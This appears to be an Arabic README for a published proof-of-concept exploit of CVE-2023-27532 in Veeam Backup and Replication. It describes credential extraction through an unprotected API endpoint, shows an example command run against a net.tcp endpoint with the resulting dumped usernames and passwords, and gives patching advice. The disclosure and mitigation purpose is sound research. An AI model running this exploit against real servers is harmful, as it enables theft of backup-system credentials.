
استغلال إثبات المفهوم لثغرة CVE-2023-27532 في Veeam Backup and Replication، والذي يستغل نقطة نهاية API غير آمنة لاستخراج بيانات الاعتماد من النظام المستهدف.
POC لثغرة CVE-2023-27532 التي تؤثر على Veeam Backup and Replication
يمكن العثور على تحليل فني لجذر المشكلة (Root Cause) الخاص بهذه الثغرة على مدونتنا: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
يستغل هذا الـ POC نقطة نهاية API غير محمية لاستخراج بيانات الاعتماد.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
قم بالتحديث إلى أحدث إصدار أو خفّف من الخطورة باتباع التعليمات الواردة في تنبيه Veeam
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بموجب إذن صريح. القائمون على المشروع ليسوا مسؤولين عن إساءة استخدام هذا البرنامج. استخدمه بمسؤولية.